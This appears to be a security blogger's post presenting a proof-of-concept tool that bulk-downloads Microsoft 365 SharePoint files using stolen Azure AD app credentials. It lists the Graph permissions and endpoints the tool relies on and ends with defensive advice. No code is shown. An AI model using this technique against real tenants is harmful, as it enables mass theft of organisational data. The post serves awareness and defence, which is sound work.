Attackers are turning their eyes towards the cloud, and since heavy data exfiltration is now part of any ransomware attack, I wanted to create an eyeopening PoC of how bad app permissions in Azure AD / Microsoft Graph can be used as part of such an attack. I’ve added a new tool to my DCToolbox PowerShell module called Invoke-DCM365DataExfiltration. Let me show you what scary stuff it can do with some stolen app credentials.
This script is a proof of concept and for testing purposes only. Do not use this script in an unethical or unlawful way. Don’t be stupid!
The Problem With Risky API Permissions
In almost every tenant I visit, I find insecure app registrations with privileged API permissions assigned. Some examples of problems I see are app owners missing MFA, too many Application Administrators in the tenant, highly privileged app registrations protected by client secrets instead of certificates, etc. The list is long but it all boils down to two major risks:
- Possible privilege escalation paths
- Possible data exfiltration
In this blog post I will showcase how an attacker can perform data exfiltration with Microsoft Graph. I will also explain what you can do to minimize risks.
Invoke-DCM365DataExfiltration
The tool I’ve created will showcase how an attacker can exfiltrate huge amounts of files from a Microsoft 365 tenant, using a poorly protected Azure AD app registration with any of the following commonly used Microsoft Graph application permissions assigned:
- Files.Read.All
- Files.ReadWrite.All
- Sites.Read.All
- Sites.ReadWrite.All
Also, one of the following permissions is required to enumerate Microsoft 365 groups and SharePoint document libraries:
- GroupMember.Read.All
- Group.Read.All
- Directory.Read.All
- Group.ReadWrite.All
- Directory.ReadWrite.All
The script will loop through all M365 groups and their respective SharePoint Online document libraries (used by Microsoft Teams for storing files) and download all files it can find, down to three folder levels. The files will be downloaded to the current directory in PowerShell.
A list of downloaded files will be copied to the clipboard after completion.
If you want to test this script, I recommend that you run it with the -WhatIf parameter to skip the actual downloads. It will still show the output and what would have been downloaded.
You can install DCToolbox from the PowerShell gallery with:
You can run Invoke-DCM365DataExfiltration in WhatIf mode like this:
Example output:
The script uses the following Graph API endpoints to find and download files in the tenant:
- https://graph.microsoft.com/v1.0/groups
- https://graph.microsoft.com/v1.0/groups/GROUPID/drive
- https://graph.microsoft.com/v1.0/drives/DRIVEID/root/children
- https://graph.microsoft.com/v1.0/drrives/items/ITEMID/children
Feel free to check out the source code in the PowerShell module if you’re interested in the actual API calls.
Defending
It is of utmost importance that we take application security in Azure AD seriously, and especially when assigning app permissions to an API like Microsoft Graph. Make sure to regularly inventory assigned API permissions. I like to use this script to do that.
Create alert rules for any API permission assignments in your SIEM solution. You should react if any highly privileged permissions (like the ones mentioned above) are assigned. There are also built-in alerts in Defender for Cloud Apps that will trigger on mass downloads and such. Make sure you react on those! Monitor for the creation of client secrets and app certificates, as new ones to existing apps can be a part of a privileged escalation attack.
And of course, practice attack and defense! See if you could pull of this attack in WhatIf mode in your tenant, or a test tenant (with proper permissions to do so of course).
I will use this PoC to make sure people understand the seriosity of good API permissions governance, and I hope it can be useful for someone else as well.
(c) Daniel Chronlund
